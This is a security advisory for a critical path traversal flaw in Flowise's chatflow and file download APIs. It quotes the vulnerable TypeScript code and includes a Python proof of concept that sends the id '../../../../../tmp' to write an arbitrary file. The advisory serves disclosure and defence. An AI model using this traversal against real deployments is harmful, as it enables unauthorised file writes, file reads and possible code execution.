Severity: Critical
CVSS Score: 9.8
### Summary Missing chat flow id validation allows an attacker to access arbitrary file. ### Details Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues. **Case 1** When creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data. ```typescript export const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => { // ... } else { const dir = path.join(getStoragePath(), chatflowid) // path traversal here if (!fs.existsSync(dir)) { fs.mkdirSync(dir, { recursive: true }) } const splitDataURI = fileBase64.split(',') const filename = splitDataURI.pop()?.split(':')[1] ?? '' const bf = Buffer.from(splitDataURI.pop() || '', 'base64') const sanitizedFilename = _sanitizeFilename(filename) const filePath = path.join(dir, sanitizedFilename) fs.writeFileSync(filePath, bf) fileNames.push(sanitizedFilename) return 'FILE-STORAGE::' + JSON.stringify(fileNames) } } ``` **Case 2** When downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path. Note that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication. ### PoC Launch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'. ```python import requests import json url = "http://localhost:8080/api/v1/chatflows" headers = {"x-request-from": "internal"} nodedata = { "category" : "Document Loaders", "inputs" : { "key" : "data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn" } } flownode = { "id" : "a", "data" : nodedata } flowdata = { "nodes" : [flownode], "edges" : [], "viewport" : { "x" : 1, "y" : 1, "zoom" : 1 } } data = { "id" : "../../../../../tmp", "name" : "name", "flowData" : json.dumps(flowdata) } res = requests.post(url, json=data, headers=headers) ``` ### Impact 1. Arbitrary file read / write 2. Remote Code Execution 3. Data loss